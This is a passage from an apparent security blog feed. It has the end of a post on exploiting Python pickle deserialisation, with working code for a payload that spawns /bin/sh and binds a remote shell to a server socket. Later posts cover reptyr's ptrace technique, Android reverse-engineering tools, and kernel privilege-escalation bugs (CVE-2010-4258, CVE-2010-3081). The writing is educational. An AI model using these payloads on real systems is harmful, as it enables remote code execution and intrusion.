      <span style="color: #dc143c;">token</span> <span style="color: #66cc66;">=</span> <span style="color: #dc143c;">cPickle</span>.<span style="color: black;">loads</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">base64</span>.<span style="color: black;">b64decode</span><span style="color: black;">&#40;</span>headers<span style="color: black;">&#91;</span><span style="color: #483d8b;">'AuthToken'</span><span style="color: black;">&#93;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
      <span style="color: #ff7700;font-weight:bold;">if</span> <span style="color: #ff7700;font-weight:bold;">not</span> check_hmac<span style="color: black;">&#40;</span><span style="color: #dc143c;">token</span><span style="color: black;">&#91;</span><span style="color: #483d8b;">'signature'</span><span style="color: black;">&#93;</span><span style="color: #66cc66;">,</span> <span style="color: #dc143c;">token</span><span style="color: black;">&#91;</span><span style="color: #483d8b;">'data'</span><span style="color: black;">&#93;</span><span style="color: #66cc66;">,</span> getSecretKey<span style="color: black;">&#40;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>:
        <span style="color: #ff7700;font-weight:bold;">raise</span> AuthenticationFailed
      <span style="color: #008000;">self</span>.<span style="color: black;">secure_data</span> <span style="color: #66cc66;">=</span> <span style="color: #dc143c;">token</span><span style="color: black;">&#91;</span><span style="color: #483d8b;">'data'</span><span style="color: black;">&#93;</span>
    <span style="color: #ff7700;font-weight:bold;">except</span>:
      <span style="color: #ff7700;font-weight:bold;">raise</span> AuthenticationFailed</pre></td></tr></table></div>


<p>So, if we just send a request that looks something like:</p>

<pre><code>AuthToken: &lt;pickle here&gt;
</code></pre>

<p>The server will happily unpickle it.</p>

<h2>Executing Code</h2>

<p>So, what can we do with that? Well, <code>pickle</code> is supposed to allow us
to represent arbitrary objects. An obvious target is Python&#8217;s
<a href="http://docs.python.org/library/subprocess.html"><code>subprocess.Popen</code></a> objects &#8212; if we can trick the target
into instantiating one of those, they&#8217;ll be executing arbitrary
commands for us! To generate such a pickle, however, we can&#8217;t just
create a <code>Popen</code> object and pickle it; For various mostly-obvious
reasons, that won&#8217;t work. We could read up on the &#8220;pickle&#8221; format and
construct a stream by hand, but it turns out there is no need to.</p>

<p><code>pickle</code> allows arbitrary objects to declare how they should be
pickled by defining a <a href="http://docs.python.org/library/pickle.html#object.__reduce__"><code>__reduce__</code></a> method, which should
return either a string or a tuple describing how to reconstruct this
object on unpacking. In the simplest form, that tuple should just
contain</p>

<ul>
<li>A callable (which must be either a class, or satisfy some other,
odder, constraints), and</li>
<li>A tuple of arguments to call that callable on.</li>
</ul>

<p><code>pickle</code> will pickle each of these pieces separately, and then on
unpickling, will call the callable on the provided arguments to
construct the new object.</p>

<p>And so, we can construct a pickle that, when un-pickled, will execute
<code>/bin/sh</code>, as follows:</p>


<div class="wp_syntax"><table><tr><td class="code"><pre class="python" style="font-family:monospace;"><span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">cPickle</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">subprocess</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">base64</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">class</span> RunBinSh<span style="color: black;">&#40;</span><span style="color: #008000;">object</span><span style="color: black;">&#41;</span>:
  <span style="color: #ff7700;font-weight:bold;">def</span> __reduce__<span style="color: black;">&#40;</span><span style="color: #008000;">self</span><span style="color: black;">&#41;</span>:
    <span style="color: #ff7700;font-weight:bold;">return</span> <span style="color: black;">&#40;</span><span style="color: #dc143c;">subprocess</span>.<span style="color: black;">Popen</span><span style="color: #66cc66;">,</span> <span style="color: black;">&#40;</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'/bin/sh'</span><span style="color: #66cc66;">,</span><span style="color: black;">&#41;</span><span style="color: #66cc66;">,</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">print</span> <span style="color: #dc143c;">base64</span>.<span style="color: black;">b64encode</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">cPickle</span>.<span style="color: black;">dumps</span><span style="color: black;">&#40;</span>RunBinSh<span style="color: black;">&#40;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span></pre></td></tr></table></div>


<h2>Getting a Remote Shell</h2>

<p>At this point, we&#8217;ve basically won. We can run arbitrary shell
commands on the target, and there are any number of ways we could
bootstrap from here up to an interactive shell and whatever else we
might want.</p>

<p>For completeness, I&#8217;ll explain what I did, since it&#8217;s a moderately
cute trick. <code>subprocess.Popen</code> lets us select which file descriptors
to attach to stdin, stdout, and stderr for the new process by passing
integers for the <code>stdin</code> and similarly-named arguments, so we can open
our <code>/bin/sh</code> on arbitrarily-numbered fd&#8217;s.</p>

<p>However, as mentioned above, the target server uses Twisted, and it
serves all requests in the same thread, using an asynchronous
event-driven model. This means we can&#8217;t necessarily predict which file
descriptor on the server will correspond to our socket, since it
depends on how many other clients are connected.</p>

<p>It also means, however, that every time we connect to the server,
we&#8217;ll open a new socket inside the same server process. So, let&#8217;s
guess that the server has fewer than, say, 20 concurrent connections
at the moment. If we connect to the server&#8217;s socket 20 times, that
will open 20 new file descriptors in the server. Since they&#8217;ll get
assigned sequentially, one of them will almost certainly be fd
20. Then, we can generate a pickle like so, and send it over:</p>


<div class="wp_syntax"><table><tr><td class="code"><pre class="python" style="font-family:monospace;"><span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">cPickle</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">subprocess</span>
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">base64</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">class</span> Exploit<span style="color: black;">&#40;</span><span style="color: #008000;">object</span><span style="color: black;">&#41;</span>:
  <span style="color: #ff7700;font-weight:bold;">def</span> __reduce__<span style="color: black;">&#40;</span><span style="color: #008000;">self</span><span style="color: black;">&#41;</span>:
    fd <span style="color: #66cc66;">=</span> <span style="color: #ff4500;">20</span>
    <span style="color: #ff7700;font-weight:bold;">return</span> <span style="color: black;">&#40;</span><span style="color: #dc143c;">subprocess</span>.<span style="color: black;">Popen</span><span style="color: #66cc66;">,</span>
            <span style="color: black;">&#40;</span><span style="color: black;">&#40;</span><span style="color: #483d8b;">'/bin/sh'</span><span style="color: #66cc66;">,</span><span style="color: black;">&#41;</span><span style="color: #66cc66;">,</span> <span style="color: #808080; font-style: italic;"># args</span>
             <span style="color: #ff4500;">0</span><span style="color: #66cc66;">,</span>            <span style="color: #808080; font-style: italic;"># bufsize</span>
             <span style="color: #008000;">None</span><span style="color: #66cc66;">,</span>         <span style="color: #808080; font-style: italic;"># executable</span>
             fd<span style="color: #66cc66;">,</span> fd<span style="color: #66cc66;">,</span> fd    <span style="color: #808080; font-style: italic;"># std{in,out,err}</span>
             <span style="color: black;">&#41;</span><span style="color: black;">&#41;</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">print</span> <span style="color: #dc143c;">base64</span>.<span style="color: black;">b64encode</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">cPickle</span>.<span style="color: black;">dumps</span><span style="color: black;">&#40;</span>Exploit<span style="color: black;">&#40;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span><span style="color: black;">&#41;</span></pre></td></tr></table></div>


<p>We&#8217;ll open a <code>/bin/sh</code> on fd 20, which should be one of our 20
connections, and if all goes well, we&#8217;ll see a prompt printed to one
of those. We&#8217;ll send some junk on that fd until we manage to get the
original server to error out and close the connection, and we&#8217;ll be
left talking to <code>/bin/sh</code> over a socket. Game over.</p>

<h2>In Conclusion</h2>

<p>Again, nothing here should be novel, nor would I expect any of these
pieces to take a competent hacker more than few minutes to figure out,
given the problem. But if this blog post teaches someone not to use
<code>pickle</code> on untrusted data, then it will be worth it.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/03/exploiting-pickle/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>reptyr: Changing a process&#8217;s controlling terminal</title>
		<link>http://blog.nelhage.com/2011/02/changing-ctty/</link>
		<comments>http://blog.nelhage.com/2011/02/changing-ctty/#comments</comments>
		<pubDate>Wed, 09 Feb 2011 03:06:50 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[reptyr]]></category>
		<category><![CDATA[termios]]></category>
		<category><![CDATA[tty]]></category>
		<category><![CDATA[unix]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=461</guid>
		<description><![CDATA[reptyr (announced recently on this blog) takes a process that is currently running in one terminal, and transplants it to a new terminal. reptyr comes from a proud family of similar hacks, and works in the same basic way: We use ptrace(2) to attach to a target process and force it to execute code of [...]]]></description>
				<content:encoded><![CDATA[<p><a href="https://github.com/nelhage/reptyr">reptyr</a> (<a href="http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/">announced</a> recently on this blog) takes a
process that is currently running in one terminal, and transplants it
to a new terminal. <code>reptyr</code> comes from a proud family of similar
hacks, and works in the same basic way: We use <a href="http://linux.die.net/man/2/ptrace"><code>ptrace(2)</code></a>
to attach to a target process and force it to execute code of our own
choosing, in order to open the new terminal, and <code>dup2(2)</code> it over
stdout and stderr.</p>

<p>The main special feature of <code>reptyr</code> is that it actually changes the
controlling terminal of the target process. The &#8220;controlling terminal&#8221;
is a concept maintained by UNIX operating systems that is independent
of a process&#8217;s file descriptors. The controlling terminal governs
details like where <code>^C</code> gets delivered, and how applications are
notified of changes in window size.</p>

<p>Processes are grouped into two levels of hierarchical groups:
sessions, and process groups. Each group is named by an ID, which is
the PID of the initial <strong>leader</strong> (either &#8220;session leader&#8221; or &#8220;process
group leader&#8221;). Even if the leader exits, that number is still the ID
for the group. Sessions are used for terminal management &#8212; Every
process in a session has the same controlling terminal, and each
terminal belongs to at most one session. Process groups are a
sub-division within sessions, and are used primarily for job control
within the shell. For a more in-depth explanation, see <a href="http://blog.nelhage.com/2010/01/a-brief-introduction-to-termios-signaling-and-job-control/">part
3</a> of my earlier series on termios.</p>

<p>If you check out <code>tty_ioctl(4)</code>, you&#8217;ll find that Linux has an
<code>ioctl</code>, <code>TIOCSCTTY</code>, that can be used to set the controlling terminal
of a process, and you could be forgiven for thinking that all we need
is to make the target call that ioctl, and we&#8217;re done.</p>

<p>However, if we read closer, we find that it has several
restrictions. In particular:</p>

<blockquote>
  <p>The calling process must be a session leader and not have a
  controlling terminal already.  If this terminal is already the
  controlling terminal of a different session group then the ioctl fails
  with EPERM […]</p>
</blockquote>

<p>In the typical case, where I&#8217;m trying to attach a (say) <code>mutt</code> that
you spawned from your shell, <code>mutt</code> won&#8217;t be a session leader &#8212; your
shell will be the session leader, and <code>mutt</code> will be the process group
leader for a process group containing only itself.</p>

<p>So, we need to make the target a session leader. Conveniently, there&#8217;s
a system call for that: <code>setsid(2)</code>.</p>

<p>However, reading that man page, we find a new caveat: <code>setsid(2)</code>
fails with <code>EPERM</code> if</p>

<blockquote>
  <p>The process group ID of any process equals the PID of the calling
  process.  Thus, in particular, setsid() fails if the calling process
  is already a process group leader.</p>
</blockquote>

<p>The shell creates a new process group for every job you launch, and so
our target <code>mutt</code> will be a process group leader, and unable to
<code>setsid()</code>. The usual solution for programs that want to setsid is to
<code>fork()</code>, so that the child is still in the parent&#8217;s session and
process group, and then <code>setsid()</code> in the child. However, <code>fork()</code>ing
our <code>mutt</code> and killing off the parent seems potentially disruptive, so
let&#8217;s see if we can avoid that.</p>

<p>So, we&#8217;re going to need to change <code>mutt</code>&#8216;s process group ID, so that
there are no processes with process group IDs equal to its
PID. Following some trusty <em><code>SEE ALSO</code></em> links, we get to
<code>setpgid(2)</code>. There&#8217;s a bunch of text in that man page, but the key
bit is:</p>

<blockquote>
  <p>If setpgid() is used to move a process from one process group to
  another, both process groups must be part of the same session (see
  setsid(2) and credentials(7)).  In this case, the pgid specifies an
  existing process group to be joined and the session ID of that group
  must match the session ID of the joining process.</p>
</blockquote>

<p>We need to find a process group in the same session as <code>mutt</code> to move
our <code>mutt</code> into, and then we&#8217;ll be able to <code>setsid</code>. We could try to
find one &#8212; the shell is a plausible candidate, for instance &#8212; but
there&#8217;s an alternate, more direct route: Create one.</p>

<p>While we have <code>mutt</code> captured with <code>ptrace</code>, we can make it <code>fork(2)</code>
a dummy child, and start tracing that child, too. We&#8217;ll make the child
<code>setpgid</code> to make it into its own process group, and then get <code>mutt</code>
to <code>setpgid</code> itself into the child&#8217;s process group. <code>mutt</code> can then
<code>setsid</code>, moving into a new session, and now, as a session leader, we
can finally <code>ioctl(TIOCSCTTY)</code> on the new terminal, and we win.</p>

<p>It turns out I didn&#8217;t invent this technique &#8212; <a href="http://blog.habets.pp.se/2009/03/Moving-a-process-to-another-terminal">injcode</a> and
<a href="http://caca.zoy.org/wiki/neercs">neercs</a> work the same way. But I did discover it
independently of them, and it was a fun little hunt through unix
arcana.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/02/changing-ctty/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>reptyr: Attach a running process to a new terminal</title>
		<link>http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/</link>
		<comments>http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/#comments</comments>
		<pubDate>Sat, 22 Jan 2011 01:56:01 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Low-level hacking]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[ptrace]]></category>
		<category><![CDATA[reptyr]]></category>
		<category><![CDATA[screenify]]></category>
		<category><![CDATA[termios]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=450</guid>
		<description><![CDATA[Over the last week, I&#8217;ve written a nifty tool that I call reptyr. reptyr is a utility for taking an existing running program and attaching it to a new terminal. Started a long-running process over ssh, but have to leave and don&#8217;t want to interrupt it? Just start a screen, use reptyr to grab it, [...]]]></description>
				<content:encoded><![CDATA[<p>Over the last week, I&#8217;ve written a nifty tool that I call
<a href="http://github.com/nelhage/reptyr">reptyr</a>. reptyr is a utility for taking an existing running
program and attaching it to a new terminal. Started a long-running
process over ssh, but have to leave and don&#8217;t want to interrupt it?
Just start a screen, use reptyr to grab it, and then kill the ssh
session and head on home.</p>

<p>You can <a href="http://github.com/nelhage/reptyr">grab the source</a>, or read on for some more details.</p>

<p>There&#8217;s a shell script called <a href="http://tomaw.net/tmp/screenify">screenify</a> that&#8217;s been going
around the internet for nigh on 10 years now that is supposed to use
gdb to accomplish the same thing. There&#8217;s also a project called
<a href="http://pasky.or.cz/~pasky/dev/retty/">retty</a> that tries to do the same thing, in C using <code>ptrace()</code>
directly.</p>

<p>The difference between those programs and reptyr is that reptyr works
much, much, better.</p>

<p>If you attach a <code>less</code> using screenify or retty, it will still take
input from the old terminal. If you attach an ncurses program, and
resize the window, the program probably won&#8217;t resize correctly. <code>^C</code>
and <code>^Z</code> will still be processed on the old terminal &#8212; typing them in
the new terminal won&#8217;t do anything useful.</p>

<p>reptyr fixes all of these problems and more, and is the only such tool
I know of that does so. I&#8217;ve never seen a program that doesn&#8217;t behave
noticeably incorrectly after attaching with retty or screenify,
whereas with reptyr most programs I have tried work flawlessly.</p>

<h2>How does it work?</h2>

<p><code>reptyr</code> works in the same basic way as <code>screenify</code> and <code>retty</code> &#8212; it
attaches to the target process using the <code>ptrace</code> API, opens the new
terminal, and <code>dup2</code>s it over the old file descriptors. It also copies
the termios settings from the old terminal to the new terminal.</p>

<p>The main thing that reptyr does that no one else does is that it
actually changes the controlling terminal of the process you are
attaching. This is the detail that makes many things Just Work,
including <code>^C</code> and <code>^Z</code> and window resizing.</p>

<p>Switching the target&#8217;s controlling terminal is not easy and involves a
fair bit of trickery with <code>ptrace</code> and Linux&#8217;s terminal APIs. I will
probably do another blog post some time about the dirty details of how
I make this work, but for now you can check out
<a href="https://github.com/nelhage/reptyr/blob/master/attach.c">attach.c</a> if
you really want to know.</p>

<p>reptyr still has a number of limitations &#8212; it doesn&#8217;t generally work,
for example, if the target process has any children. I know how to fix
most of these problems, though, so expect it to get better with
time. Please let me know if you find it useful!</p>

<h2>Appendix</h2>

<p>(Edited to add:) Nothing is really new. A commenter on reddit pointed out that <a href="http://blog.habets.pp.se/2009/03/Moving-a-process-to-another-terminal">injcode</a>
and <a href="http://caca.zoy.org/wiki/neercs">neercs</a> both accomplish the same thing, even using the same trick
to change the CTTY. Ah well, I had run writing it anyways, and apparently I
wasn&#8217;t the only one who didn&#8217;t know about the existing alternatives. <code>neercs</code> is a full screen replacement, though, and I think that reptyr should be more robust than <code>injcode</code> &#8212; I use a different techique for <code>ptrace</code>-hijacking, for example &#8212; and so hopefully this tool still has a niche as a more robust standalone utility. Certainly, judging from the amount of enthusiasm I&#8217;ve seen for this tool, this still isn&#8217;t a problem that is solved to the average user&#8217;s satisfaction.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/feed/</wfw:commentRss>
		<slash:comments>57</slash:comments>
		</item>
		<item>
		<title>Some Android reverse-engineering tools</title>
		<link>http://blog.nelhage.com/2010/12/some-android-reverse-engineering-tools/</link>
		<comments>http://blog.nelhage.com/2010/12/some-android-reverse-engineering-tools/#comments</comments>
		<pubDate>Mon, 27 Dec 2010 20:26:13 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Low-level hacking]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[dalvik]]></category>
		<category><![CDATA[dedexer]]></category>
		<category><![CDATA[reverse-engineering]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=436</guid>
		<description><![CDATA[I&#8217;ve spent a lot of time this last week staring at decompiled Dalvik assembly. In the process, I created a couple of useful tools that I figure are worth sharing. I&#8217;ve been using dedexer instead of baksmali, honestly mainly because the former&#8217;s output has fewer blank lines and so is more readable on my netbook&#8217;s [...]]]></description>
				<content:encoded><![CDATA[<p>I&#8217;ve spent a lot of time this last week staring at decompiled Dalvik
assembly. In the process, I created a couple of useful tools that I
figure are worth sharing.</p>

<p>I&#8217;ve been using <a href="http://dedexer.sourceforge.net/">dedexer</a> instead of <a href="http://code.google.com/p/smali/">baksmali</a>,
honestly mainly because the former&#8217;s output has fewer blank lines and
so is more readable on my netbook&#8217;s screen. Thus, these tools are
designed to work with the output of dedexer, but the formats are
simple enough that they should be easily portable to smali, if that&#8217;s
your tool of choice (And it does look like a better tool overall, from
what I can see).</p>

<h2><code>ddx.el</code></h2>

<p>I&#8217;m an emacs junkie, and I can&#8217;t stand it when I have to work with a
file that doesn&#8217;t have an emacs mode. So, a day into staring at
un-highlighted <code>.ddx</code> files in <code>fundamental-mode</code>, I broke down and
threw together <a href="https://github.com/nelhage/reverse-android/blob/master/ddx.el"><code>ddx-mode</code></a>. It&#8217;s fairly minimal, but it
provides functional syntax highlighting, and a little support for
navigating between labels. One cute feature I threw in is that, if you
move the point over a label, any other instances of that label get
highlighted, which I found useful in keeping track of all the &#8220;lXXXXX&#8221;
labels dedexer generates.</p>

<div id="attachment_438" class="wp-caption aligncenter" style="width: 509px"><a href="http://blog.nelhage.com/wp-content/uploads/2010/12/ddx-e1293480505629.png"><img src="http://blog.nelhage.com/wp-content/uploads/2010/12/ddx-e1293480505629.png" alt="" title="ddx-mode" width="499" height="471" class="size-full wp-image-438" /></a><p class="wp-caption-text">An example file (from k9mail) highlighted using ddx-mode</p></div>

<h2><code>ddx2dot</code></h2>

<p>Dalvik assembly is, on the whole pretty easy to read, but occasionally
you stumble on huge methods that clearly originated from multiple
nested loops and some horrible chained if statements. And what you&#8217;d
really like is to be able to see the structure of the code, as much as
the details of the instructions.</p>

<p>To that end, I threw together a Python script that &#8220;parses&#8221; <code>.ddx</code>
files, and renders them to a control-flow graph using <a href="http://www.graphviz.org/">dot</a>. As
an example, the <a href="http://code.google.com/p/k9mail/source/browse/k9mail/trunk/src/com/fsck/k9/mail/store/ImapResponseParser.java?r=2996#119"><code>parseToken</code></a> method from the IMAP parser
in the <a href="http://code.google.com/p/k9mail/">k9mail</a> application for Android looks like the following,
when disassembled and rendered to a CFG:</p>

<div id="attachment_442" class="wp-caption aligncenter" style="width: 310px"><a href="http://blog.nelhage.com/wp-content/uploads/2010/12/parseToken.png"><img src="http://blog.nelhage.com/wp-content/uploads/2010/12/parseToken-300x143.png" alt="" title="parseToken" width="300" height="143" class="size-medium wp-image-442" /></a><p class="wp-caption-text">A CFG for k9mail's <tt>ImapResponseParser.parseToken</tt> method</p></div>

<p>I use the term &#8220;parses&#8221; because it&#8217;s really just a pile of regexes, <code>line.split()</code> and <code>line.startswith("...")</code>, but it gets the job done, so I hope it might be of use to someone else. The biggest missing feature is that it doesn&#8217;t parse <code>catch</code> directives, so those just end up floating out to the side as unattached blocks.</p>

<p>You&#8217;ll also notice the rounded &#8220;return&#8221; blocks &#8212; either <code>javac</code> or <code>dx</code> merges all exits from a function to go through the same <code>return</code> block, but I found that preserving that feature in the CFG produces a lot of clutter and makes it hard to read, so I lift every edge that would go to that common block to go to a separate block.</p>

<h2>Github</h2>

<p>Both tools live in my &#8220;reverse-android&#8221; <a href="https://github.com/nelhage/reverse-android">repository</a> on
github, and are released under the MIT license. Please feel free to do
whatever you want with them, although I&#8217;d appreciate it if you let me
know if you make any improvements or find them useful.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/12/some-android-reverse-engineering-tools/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>CVE-2010-4258: Turning denial-of-service into privilege escalation</title>
		<link>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/</link>
		<comments>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/#comments</comments>
		<pubDate>Fri, 10 Dec 2010 16:02:11 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[bugs]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[full-nelson]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=418</guid>
		<description><![CDATA[Dan Rosenberg recently released a privilege escalation bug for Linux, based on three different kernel vulnerabilities I reported recently. This post is about CVE-2010-4258, the most interesting of them, and, as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m going to do a brief tour of the various [...]]]></description>
				<content:encoded><![CDATA[<p>Dan Rosenberg recently <a href="http://thread.gmane.org/gmane.comp.security.full-disclosure/76457">released</a> a privilege escalation bug
for Linux, based on three different kernel vulnerabilities I reported
recently. This post is about CVE-2010-4258, the most interesting of them, and,
as Dan writes, the reason he wrote the exploit in the first place. In it, I&#8217;m
going to do a brief tour of the various kernel features that collided to make
this bug possible, and explain how they combine to turn an otherwise-boring oops
into privilege escalation.</p>

<h2><code>access_ok</code></h2>

<p>When a user application passes a pointer to the kernel, and the kernel
wants to read or write from that pointer, the kernel needs to perform
various checks that a buggy or malicious userspace app hasn&#8217;t passed
an &#8220;evil&#8221; pointer.</p>

<p>Because the kernel and userspace run in the same address space, the
most important check is simply that the pointer points into the
&#8220;userspace&#8221; part of the address space. User applications are protected
by page table permissions from writing into kernel memory, but the
kernel isn&#8217;t, and so must explicitly check that any pointers given to
it by a user don&#8217;t point into the kernel region.</p>

<p>The address space is laid out such that user applications get the
bottom portion, and the kernel gets the top, so this check is a simple
comparison against that boundary. The kernel function that performs
this check is called <code>access_ok</code>, although there are various other
functions that do the same check, implicitly or otherwise.</p>

<h2><code>get_fs()</code> and <code>set_fs()</code></h2>

<p>Occasionally, however, the kernel finds it useful to change the rules for what
<code>access_ok</code> will allow. <code>set_fs()</code><sup><a href="#fn.1" class="footnote" name="fnr.1">1</a></sup> is an internal Linux function that is used to
override the definition of the user/kernel split, for the current process.</p>

<p>After a <code>set_fs(KERNEL_DS)</code>, no checking is performed that user pointers
point to userspace &#8212; <code>access_ok</code> will always return
true. <code>set_fs(KERNEL_DS)</code> is mainly used to enable the kernel to wrap
functions that expect user pointers, by passing them pointers into the
kernel address space. A typical use reads something like this:</p>

<pre><code>old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &amp;pos);
set_fs(old_fs);
</code></pre>

<p><code>vfs_readv</code> expects a user-provided pointer, so without the <code>set_fs()</code>, the
<code>access_ok()</code> inside <code>vfs_readv()</code> would fail on our kernel buffer, so we use
<code>set_fs()</code> to effectively temporarily disable that checking.</p>

<h2>Kernel oopses</h2>

<p>When the kernel oopses, perhaps because of a <code>NULL</code> pointer
dereference in kernelspace, or because of a call to the <code>BUG()</code> macro
to indicate an assertion failure, the kernel attempts to clean up, and
then tries to kill the current process by calling the <code>do_exit()</code>
function to exit the current process.</p>

<p>When the kernel does so, it&#8217;s still running in the same process
context it was before the oops occured, including any <code>set_fs()</code>
override, if applicable. Which means that <code>do_exit</code> will get called
with <code>access_ok</code> disabled &#8212; not something anyone expected when they
wrote the individual pieces of this system.</p>

<h2><code>clear_child_tid</code></h2>

<p>As it turns out, <code>do_exit</code> contains a write to a user-controlled
address that expects <code>access_ok</code> to be working properly!</p>

<p><code>clear_child_tid</code> is a feature where, on thread exit, the kernel can
be made to write a zero into a specified address in that thread&#8217;s
address space, in order to notify other threads of that exit.</p>

<p>This is implemented by simply storing a pointer to the to-be-zeroed
address inside <code>struct task_struct</code> (which represents a single thread
or process), and, on exit, <code>mm_release</code>, called from <code>do_exit</code>, does:</p>

<pre><code>put_user(0, tsk-&gt;clear_child_tid);
</code></pre>

<p>This is normally safe, because <code>put_user</code> checks that its second
argument falls into the &#8220;userspace&#8221; segment before doing a write. But,
if we are running with <code>get_fs() == KERNEL_DS</code>, it will happily accept
any address at all, even one pointing into kernel space.</p>

<p>So, if we find any kernel <code>BUG()</code> or <code>NULL</code> dereference, or other page
fault, that we can trigger after a <code>set_fs(KERNEL_DS)</code>, we can trick
the kernel into a user-controlled write into kernel memory!</p>

<h2><code>splice()</code> et. al.</h2>

<p>An obvious question at this point is: How much of the kernel can an
attacker cause to run with <code>get_fs() == KERNEL_DS</code>?</p>

<p>There are a number of small special cases. For example, the binary
sysctl compatibility code works by calling the normal <code>/proc/</code> write
handlers from kernelspace, under <code>set_fs()</code>. handful of compat-mode
(32 on 64) syscalls work similarly.</p>

<p>By far the biggest source I&#8217;ve found, however, is the <code>splice()</code>
system call. The <code>splice()</code> system call is a relatively recent
addition to Linux, and allows for zero-copy transfer of pages between
a pipe and another file descriptor.</p>

<p>As of 2.6.31, attempts to <code>splice()</code> to or from an fd that doesn&#8217;t
support special handling to actually do zero-copy <code>splice</code>, will fall
back on doing an ordinary <code>read()</code>, <code>write()</code>, or <code>sendmsg()</code> on the
fd &#8230; from the kernel, using set_fs() in order to pass in kernel
buffers.</p>

<p>What that means it that by using <code>splice()</code>, an attacker can call the
bulk of the code in most obscure filesystems and socket types (which
tend not to have explicit <code>splice()</code> support) with a segment override
in place. Conveniently for an attacker, that is also exactly a
description of where the bulk of the random security bugs tend to be.</p>

<p>This is also exactly the technique Dan&#8217;s exploit uses. He uses
CVE-2010-3849, an otherwise boring <code>NULL</code> pointer dereference I
reported in the Econet network protocol. His exploit code does a
<code>splice()</code> to an econet socket, causing the <code>econet_sendsmg</code> handler to
get called under <code>set_fs(KERNEL_DS)</code>. When it oopses, <code>do_exit</code> is
called, and he gets a user-controlled write into kernel
memory. Everything else is just details.</p>

<p><div id="footnotes">
<h2 class="footnotes">Footnotes: </h2>
<div id="text-footnotes">
<p class="footnote"><sup><a class="footnum" name="fn.1" href="#fnr.1">1</a></sup> Back in Linux 1.x, this function actually set the <tt>%fs</tt> register on i386. It hasn&#8217;t in years, but it&#8217;s used in too many places for changing the name to be worth it.</p>
</div></div></p>


]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Some notes on CVE-2010-3081 exploitability</title>
		<link>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/</link>
		<comments>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/#comments</comments>
		<pubDate>Tue, 30 Nov 2010 16:58:01 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[cve-2010-3081]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=401</guid>
		<description><![CDATA[Most of you reading this blog probably remember CVE-2010-3081. The bug got an awful lot of publicity when it was discovered an announced, due to allowing local privilege escalation against virtually all 64-bit Linux kernels in common use at the time. While investigating CVE-2010-3081, I discovered that several of the commonly-believed facts about the CVE [...]]]></description>
				<content:encoded><![CDATA[<p>Most of you reading this blog probably remember
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081">CVE-2010-3081</a>. The bug got an awful lot of publicity when it
was discovered an announced, due to allowing local privilege
escalation against virtually all 64-bit Linux kernels in common use at
the time.</p>

<p>While investigating CVE-2010-3081, I discovered that several of the
commonly-believed facts about the CVE were wrong, and it was even more
broadly exploitable than was publically documented. I&#8217;d like to share
those observations here.</p>

<h2>A brief review of the bug</h2>

<p>The bug arose from the <code>compat_alloc_user_space</code> function in Linux&#8217;s
32-bit compatibility support on 64-bit
